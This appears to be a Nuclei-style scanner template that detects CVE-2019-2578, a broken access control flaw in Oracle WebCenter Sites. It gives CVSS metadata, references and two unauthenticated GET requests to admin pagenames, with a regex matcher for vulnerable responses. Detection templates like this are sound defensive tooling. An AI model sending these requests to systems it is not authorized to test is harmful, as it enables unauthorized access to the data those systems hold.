id: CVE-2019-2578

info:
  name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control
  author: leovalcante
  severity: high
  description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
  reference:
    - https://www.oracle.com/security-alerts/cpuapr2019.html
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2578
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2019-2578
  tags: cve,cve2019,oracle,wcs,auth-bypass

requests:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - '<script[\d\D]*<throwexception/>'


# Enhanced by mp on 2022/05/04